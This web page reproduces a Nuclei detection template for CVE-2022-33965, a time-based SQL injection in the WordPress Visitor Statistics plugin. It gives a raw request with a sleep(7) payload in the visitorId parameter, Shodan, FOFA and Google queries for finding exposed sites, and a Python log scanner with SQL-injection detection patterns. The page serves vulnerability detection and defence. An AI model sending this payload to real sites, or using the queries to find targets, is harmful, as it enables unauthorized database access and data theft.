WordPress Visitor Statistics <=5.7 - SQL Injection
ID: CVE-2022-33965
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market
Description
WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
id: CVE-2022-33965

info:
  name: WordPress Visitor Statistics <=5.7 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability.
  reference:
    - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
    - https://wordpress.org/plugins/wp-stats-manager/
    - https://wordpress.org/plugins/wp-stats-manager/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2022-33965
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-33965
    cwe-id: CWE-89
    epss-score: 0.01516
    epss-percentile: 0.86982
    cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: plugins-market
    product: wp_visitor_statistics
    framework: wordpress
    shodan-query: http.html:"wp-stats-manager"
    fofa-query: body="wp-stats-manager"
    google-query: inurl:"/wp-content/plugins/wp-stats-manager"
  tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market

http:
  - raw:
      - |
        @timeout: 15s
        GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: regex
        regex:
          - "^1331' and sleep\\(7\\) or '$"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201ced8d069b368f415538651437beaf6caab9b4824a33ff23dce947feb7847216022100beadf4436cca5f056551e6ab718c6dd3a4ca642742eecbbc3819eee0d1fcc654:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-33965.yaml"
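
For the defensive side of the request shown in the template, the following added example (not part of the template or the plugin) scans web access logs for `wmcAction=wmcTrack` requests carrying injection-like values. It assumes combined-log-format lines and that legitimate `visitorId`, `uid` and `pid` values are digits only, as in the template's benign parameters; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-log-format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments typical of injection probes (constructed list, extend as needed)
SQLI_RE = re.compile(r"sleep\s*\(|benchmark\s*\(|waitfor\s+delay|union\s+select", re.I)
# Parameters assumed to be numeric in legitimate tracking requests (assumption)
NUMERIC_PARAMS = ("visitorId", "uid", "pid")

# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331 HTTP/1.1" 200 12',
    "203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] \"GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\" 200 31",
    '203.0.113.9 - - [01/Jan/2024:10:00:20 +0000] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331%27%20or%20%271 HTTP/1.1" 200 31',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4512',
]


def suspicious_wmc_request(log_line):
    """Return a reason string if the line looks like an injection attempt
    against the wmcTrack endpoint, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # parse_qs URL-decodes values, so '+', %27 and %20 are normalised first
    query = parse_qs(urlsplit(m.group(1)).query)
    if "wmcTrack" not in query.get("wmcAction", []):
        return None
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if SQLI_RE.search(value):
                return f"{name}: SQL function in value {value!r}"
            if not value.isdigit():
                return f"{name}: non-numeric value {value!r}"
    return None


def scan(lines):
    """Return (line_number, reason) for every flagged line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        reason = suspicious_wmc_request(line)
        if reason:
            hits.append((lineno, reason))
    return hits


if __name__ == "__main__":
    for lineno, reason in scan(SAMPLE_LOG):
        print(f"line {lineno}: {reason}")
```

Flagged lines only show that a probe was sent; whether the site was affected depends on the installed plugin version, which the template's remediation note puts at 5.8 or later for the fix.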